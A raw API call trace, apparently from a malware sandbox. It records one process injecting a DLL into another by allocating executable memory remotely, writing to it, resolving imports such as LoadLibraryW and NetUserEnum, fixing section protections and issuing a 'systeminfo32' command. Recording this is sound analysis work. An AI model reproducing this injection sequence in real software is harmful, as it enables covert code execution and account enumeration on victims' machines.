	[0155.144] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.144] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.144] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.145] ResetEvent (hEvent=0x488) returned 1
	[0155.145] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.145] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.145] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.145] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.145] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.145] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040b8, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.146] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.146] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.146] lstrlenA (lpString="_vsnwprintf") returned 11
	[0155.146] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.146] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc350*, nSize=0xc, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc350*, lpNumberOfBytesWritten=0x128494*=0xc) returned 1
	[0155.146] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.146] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.147] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.147] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.147] ResetEvent (hEvent=0x488) returned 1
	[0155.147] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.147] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.147] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.148] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.148] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.148] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040bc, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.148] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.148] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.148] lstrlenA (lpString="??3@YAXPAX@Z") returned 12
	[0155.148] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.148] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc36e*, nSize=0xd, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc36e*, lpNumberOfBytesWritten=0x128494*=0xd) returned 1
	[0155.149] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.149] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.149] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.149] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.149] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.150] ResetEvent (hEvent=0x488) returned 1
	[0155.150] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.150] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.150] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.150] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.150] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.150] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040c0, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.151] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.151] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0155.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc40a, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0155.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc40a, cbMultiByte=-1, lpWideCharStr=0x23078e8, cchWideChar=12 | out: lpWideCharStr="SHLWAPI.dll") returned 12
	[0155.151] lstrlenW (lpString="SHLWAPI.dll") returned 11
	[0155.151] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.151] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x23078e8*, nSize=0x18, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x23078e8*, lpNumberOfBytesWritten=0x128494*=0x18) returned 1
	[0155.151] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128418 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128418*=0x70) returned 1
	[0155.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.151] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.151] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0xc, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x128410*=0xc) returned 1
	[0155.152] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438*, nSize=0x70, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesWritten=0x128410*=0x70) returned 1
	[0155.152] ResetEvent (hEvent=0x488) returned 1
	[0155.152] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.153] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128410*=0x70) returned 1
	[0155.154] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.154] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.154] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.154] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.154] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.154] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.154] lstrlenA (lpString="StrFormatByteSizeW") returned 18
	[0155.154] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.154] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc3f6*, nSize=0x13, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc3f6*, lpNumberOfBytesWritten=0x128494*=0x13) returned 1
	[0155.155] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.155] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.155] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.155] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.155] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.156] ResetEvent (hEvent=0x488) returned 1
	[0155.156] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.156] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.156] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.156] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.156] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.156] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004094, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.157] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.157] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0155.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc438, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0155.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc438, cbMultiByte=-1, lpWideCharStr=0x23078e8, cchWideChar=13 | out: lpWideCharStr="NETAPI32.dll") returned 13
	[0155.157] lstrlenW (lpString="NETAPI32.dll") returned 12
	[0155.157] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.157] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x23078e8*, nSize=0x1a, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x23078e8*, lpNumberOfBytesWritten=0x128494*=0x1a) returned 1
	[0155.157] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128418 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128418*=0x70) returned 1
	[0155.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.157] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.158] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0xc, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x128410*=0xc) returned 1
	[0155.158] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438*, nSize=0x70, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesWritten=0x128410*=0x70) returned 1
	[0155.158] ResetEvent (hEvent=0x488) returned 1
	[0155.158] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.163] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128410*=0x70) returned 1
	[0155.163] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.163] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.163] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.163] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.164] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.164] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.164] lstrlenA (lpString="NetUserEnum") returned 11
	[0155.164] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.164] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc42c*, nSize=0xc, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc42c*, lpNumberOfBytesWritten=0x128494*=0xc) returned 1
	[0155.164] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.164] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.164] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.164] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.165] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.165] ResetEvent (hEvent=0x488) returned 1
	[0155.165] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.166] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.166] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.167] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.167] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.167] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004074, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.167] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.167] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.167] lstrlenA (lpString="NetApiBufferFree") returned 16
	[0155.167] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.167] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc418*, nSize=0x11, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc418*, lpNumberOfBytesWritten=0x128494*=0x11) returned 1
	[0155.168] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.168] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.168] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.168] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.168] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.169] ResetEvent (hEvent=0x488) returned 1
	[0155.169] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.169] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.169] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.169] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.169] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.169] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004078, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.170] lstrcmpA (lpString1="Control", lpString2="Start") returned -1
	[0155.170] lstrcmpA (lpString1="Control", lpString2="Control") returned 0
	[0155.170] lstrcmpA (lpString1="FreeBuffer", lpString2="Start") returned -1
	[0155.170] lstrcmpA (lpString1="FreeBuffer", lpString2="Control") returned 1
	[0155.170] lstrcmpA (lpString1="FreeBuffer", lpString2="FreeBuffer") returned 0
	[0155.170] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Start") returned -1
	[0155.170] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Control") returned 1
	[0155.170] lstrcmpA (lpString1="JNI_OnLoad", lpString2="FreeBuffer") returned 1
	[0155.170] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Release") returned -1
	[0155.170] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Start") returned -1
	[0155.170] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Control") returned 1
	[0155.170] lstrcmpA (lpString1="JNI_OnUnload", lpString2="FreeBuffer") returned 1
	[0155.170] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Release") returned -1
	[0155.170] lstrcmpA (lpString1="Release", lpString2="Start") returned -1
	[0155.170] lstrcmpA (lpString1="Release", lpString2="Control") returned 1
	[0155.170] lstrcmpA (lpString1="Release", lpString2="FreeBuffer") returned 1
	[0155.170] lstrcmpA (lpString1="Release", lpString2="Release") returned 0
	[0155.170] lstrcmpA (lpString1="Start", lpString2="Start") returned 0
	[0155.170] VirtualProtectEx (in: hProcess=0x494, lpAddress=0x10001000, dwSize=0x2700, flNewProtect=0x20, lpflOldProtect=0x1285fc | out: lpflOldProtect=0x1285fc*=0x4) returned 1
	[0155.171] VirtualProtectEx (in: hProcess=0x494, lpAddress=0x10004000, dwSize=0xdcc, flNewProtect=0x2, lpflOldProtect=0x1285fc | out: lpflOldProtect=0x1285fc*=0x4) returned 1
	[0155.171] VirtualProtectEx (in: hProcess=0x494, lpAddress=0x10005000, dwSize=0x3ec, flNewProtect=0x4, lpflOldProtect=0x1285fc | out: lpflOldProtect=0x1285fc*=0x4) returned 1
	[0155.171] VirtualProtectEx (in: hProcess=0x494, lpAddress=0x10006000, dwSize=0x326, flNewProtect=0x2, lpflOldProtect=0x1285fc | out: lpflOldProtect=0x1285fc*=0x4) returned 1
	[0155.171] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128568, nSize=0x70, lpNumberOfBytesRead=0x128548 | out: lpBuffer=0x128568*, lpNumberOfBytesRead=0x128548*=0x70) returned 1
	[0155.171] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.171] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.171] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x23078e8*, nSize=0x14, lpNumberOfBytesWritten=0x128540 | out: lpBuffer=0x23078e8*, lpNumberOfBytesWritten=0x128540*=0x14) returned 1
	[0155.172] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128568*, nSize=0x70, lpNumberOfBytesWritten=0x128540 | out: lpBuffer=0x128568*, lpNumberOfBytesWritten=0x128540*=0x70) returned 1
	[0155.172] ResetEvent (hEvent=0x488) returned 1
	[0155.172] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.172] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128568, nSize=0x70, lpNumberOfBytesRead=0x128540 | out: lpBuffer=0x128568*, lpNumberOfBytesRead=0x128540*=0x70) returned 1
	[0155.172] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.173] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.173] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d3cc0) returned 1
	[0155.173] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ad4 | out: lpSystemTimeAsFileTime=0x128ad4*(dwLowDateTime=0x4642aea0, dwHighDateTime=0x1d50a6a)) 
	[0155.173] lstrlenA (lpString="systeminfo32") returned 12
	[0155.173] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.173] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x22ad228*, nSize=0xd, lpNumberOfBytesWritten=0x128a84 | out: lpBuffer=0x22ad228*, lpNumberOfBytesWritten=0x128a84*=0xd) returned 1
	[0155.173] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.173] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x128ef4*, nSize=0x400, lpNumberOfBytesWritten=0x128a84 | out: lpBuffer=0x128ef4*, lpNumberOfBytesWritten=0x128a84*=0x400) returned 1
	[0155.174] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x184, flAllocationType=0x3000, flProtect=0x40) returned 0x100000
	[0155.174] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100000, lpBuffer=0x128cf0*, nSize=0x184, lpNumberOfBytesWritten=0x128a80 | out: lpBuffer=0x128cf0*, lpNumberOfBytesWritten=0x128a80*=0x184) returned 1
	[0155.174] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128a08, nSize=0x70, lpNumberOfBytesRead=0x1289e8 | out: lpBuffer=0x128a08*, lpNumberOfBytesRead=0x1289e8*=0x70) returned 1
	[0155.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ee0
	[0155.174] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x40) returned 0x350000
	[0155.174] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x350000, lpBuffer=0x22a5ee0*, nSize=0x28, lpNumberOfBytesWritten=0x1289e0 | out: lpBuffer=0x22a5ee0*, lpNumberOfBytesWritten=0x1289e0*=0x28) returned 1
	[0155.175] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128a08*, nSize=0x70, lpNumberOfBytesWritten=0x1289e0 | out: lpBuffer=0x128a08*, lpNumberOfBytesWritten=0x1289e0*=0x70) returned 1
	[0155.175] ResetEvent (hEvent=0x488) returned 1
	[0155.175] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.177] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128a08, nSize=0x70, lpNumberOfBytesRead=0x1289e0 | out: lpBuffer=0x128a08*, lpNumberOfBytesRead=0x1289e0*=0x70) returned 1
	[0155.177] VirtualFreeEx (hProcess=0x494, lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.177] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ee0) returned 1
	[0155.177] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x128ef4, nSize=0x400, lpNumberOfBytesRead=0x128a98 | out: lpBuffer=0x128ef4*, lpNumberOfBytesRead=0x128a98*=0x400) returned 1
